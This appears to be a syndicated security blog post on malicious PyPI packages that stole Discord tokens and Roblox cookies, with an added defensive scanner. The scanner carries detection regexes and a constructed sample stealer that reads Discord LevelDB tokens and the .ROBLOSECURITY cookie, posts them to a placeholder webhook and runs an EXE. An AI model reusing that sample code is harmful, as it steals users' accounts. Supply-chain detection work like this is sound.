Malicious Roblox Cookie and Discord Token Stealers Hit PyPI Repository
Over the past few years, Sonatype has consistently been at the forefront of discovering malicious packages infiltrating open source ecosystems such as npm, PyPI, and GitHub. Examples include the Discord token and credit card stealers previously caught on the npm registry by our automated malware detection system, Nexus Firewall.
And just last week, we reported that the PyPI repository had been flooded with more than 1,200 dependency confusion packages that served no functional purpose.
This week, our early warning systems have once again caught malicious PyPI packages, this time ones that steal Roblox security cookies and Discord tokens. The packages shown below are tracked in Sonatype's security data as sonatype-2022-0706 and sonatype-2022-0723.
Package (Downloads) | Author | Purpose | Description
xss | HeyDeveloper aka Drake | Typosquatting | Discord token stealer, not a PoC for an "XSS" attack as the package claims
Easyfuncsys | | Possible typosquat of a legitimate package | Steals Discord token and leveldb files, runs a suspicious EXE
Humanqueen | Xin1337 | Unclear | Steals Discord token and leveldb files
Humanqueenn | Xin1337 | Unclear | Steals Discord token and leveldb files
According to PePy stats, these packages have been retrieved a total of 3,916 times; that figure includes downloads by PyPI users as well as by automated mirrors, so it is an upper bound on the number of affected installs.
On discovering these packages this week, we rushed our findings to the PyPI security team, who have since removed them.
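The behaviours listed in the table above (Discord tokens pulled out of Discord's LevelDB files, a Roblox security cookie, a dropped EXE, exfiltration of the result) leave recognisable traces in a package's source, and they are the kind of thing a reviewer can grep for before installing. The following is an added example, not Sonatype's Nexus Firewall code and not code from any of the packages named here: a small heuristic scanner that reads the .py members of a wheel or sdist and reports which stealer indicators each file contains, plus a PEP 503-normalised edit-distance check for typosquats. The indicator regexes, the sample "stealer" source the scanner is run against and the list of known package names are all constructed for this example. The only real-world facts they rest on are that Discord keeps its web-app Local Storage in a LevelDB directory, that Discord tokens match the 24.6.27-character pattern (or mfa. followed by 84 characters) that stealers embed, and that .ROBLOSECURITY is the name of the Roblox session cookie.

```python
from __future__ import annotations

import io
import re
import tarfile
import zipfile
from typing import Iterable

# Stealer indicators as (label, regex over Python source). These regexes are
# assumptions made for this example, not Sonatype's detection rules.
INDICATORS = [
    # Discord keeps its web-app Local Storage as a LevelDB directory; stealers
    # read the .ldb/.log files in it.
    ("discord_leveldb_path", re.compile(r"(?i)discord.{0,40}local\s*storage.{0,10}leveldb")),
    # The token regex stealers embed: 24.6.27 chars, or mfa. followed by 84.
    ("discord_token_regex", re.compile(r"\{24\}.{0,12}\{6\}.{0,12}\{27\}|mfa\\?\..{0,8}\{84\}")),
    # .ROBLOSECURITY is the Roblox session cookie.
    ("roblox_security_cookie", re.compile(r"\.ROBLOSECURITY")),
    # Exfiltration to a Discord webhook.
    ("discord_webhook_url", re.compile(r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/")),
    # Launching a dropped Windows binary.
    ("executes_exe", re.compile(r"(?i)(?:os\.startfile|subprocess\.\w+)\([^)\n]{0,120}\.exe")),
]


def scan_source(text: str) -> list[str]:
    """Labels of every indicator present in one Python source file, in INDICATORS order."""
    return [label for label, rx in INDICATORS if rx.search(text)]


def iter_python_sources(archive: bytes) -> Iterable[tuple[str, str]]:
    """Yield (member name, source) for each .py file in a wheel (zip) or sdist (tar.gz)."""
    buf = io.BytesIO(archive)
    if zipfile.is_zipfile(buf):
        buf.seek(0)
        with zipfile.ZipFile(buf) as zf:
            for name in zf.namelist():
                if name.endswith(".py"):
                    yield name, zf.read(name).decode("utf-8", errors="replace")
        return
    buf.seek(0)
    with tarfile.open(fileobj=buf, mode="r:*") as tf:
        for member in tf.getmembers():
            if member.isfile() and member.name.endswith(".py"):
                fh = tf.extractfile(member)
                if fh is not None:
                    yield member.name, fh.read().decode("utf-8", errors="replace")


def scan_archive(archive: bytes) -> dict[str, list[str]]:
    """Map each .py member that trips at least one indicator to its indicator labels."""
    return {name: labels for name, text in iter_python_sources(archive)
            if (labels := scan_source(text))}


def normalize_name(name: str) -> str:
    """PEP 503 normalisation: lowercase, runs of '-', '_' and '.' collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert, delete, substitute) with a two-row table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name: str, known: Iterable[str], max_distance: int = 1) -> list[str]:
    """Known names within max_distance edits of `name` after normalisation (exact match excluded)."""
    target = normalize_name(name)
    return [k for k in known
            if normalize_name(k) != target and edit_distance(target, normalize_name(k)) <= max_distance]


# Constructed sample "stealer" source for exercising the scanner. It is not the
# code of any package named on the page and is never executed here.
SAMPLE_STEALER_PY = r'''
import os, re, subprocess, requests
roaming = os.getenv("APPDATA")
ldb = os.path.join(roaming, "discord", "Local Storage", "leveldb")
tokens = []
for f in os.listdir(ldb):
    data = open(os.path.join(ldb, f), errors="ignore").read()
    tokens += re.findall(r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}|mfa\.[\w-]{84}", data)
cookies = open(os.path.join(roaming, "cookies.txt"), errors="ignore").read()
roblox = re.findall(r"\.ROBLOSECURITY=(\S+)", cookies)
requests.post("https://discord.com/api/webhooks/0/constructed", json={"t": tokens, "r": roblox})
subprocess.call(os.path.join(roaming, "update.exe"), shell=True)
'''

SAMPLE_CLEAN_PY = "def add(a, b):\n    return a + b\n"


def build_wheel_like_zip(files: dict[str, str]) -> bytes:
    """Pack {member name: source} into an in-memory zip standing in for a wheel."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, text in files.items():
            zf.writestr(name, text)
    return buf.getvalue()


if __name__ == "__main__":
    wheel = build_wheel_like_zip({"pkg/__init__.py": SAMPLE_CLEAN_PY, "pkg/core.py": SAMPLE_STEALER_PY})
    print(scan_archive(wheel))  # every .py member that tripped an indicator, with its labels
    print(typosquat_candidates("colorame", ["requests", "colorama"]))  # constructed known-name list
```

A hit is a reason to read the package, not proof of malice: a legitimate Discord client library can contain the token regex, and the EXE indicator fires on any installer that launches a Windows binary. Plain Levenshtein counts a transposition such as "reqeusts" as two edits, so either allow max_distance=2 or swap in a Damerau variant when screening newly published names against popular ones.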
Roblox Security Cookie Stealer
As platforms like Discord and Roblox have gained popularity and rapid adoption among gamers, threat actors continue to target their users and developers through techniques like typosquatting and brandjacking, as Sonatype has previously reported.
However, the packages caught this time have a quirky twist.
Starting with the PyPI package ‘xss,’ for example, we see it touts itself to be a “simple XSS (Read more...)
This is a Security Bloggers Network syndicated blog from Sonatype Blog, authored by Ax Sharma. Read the original post at: https://blog.sonatype.com/malicious-roblox-cookie-and-discord-token-stealers-hit-pypi-repository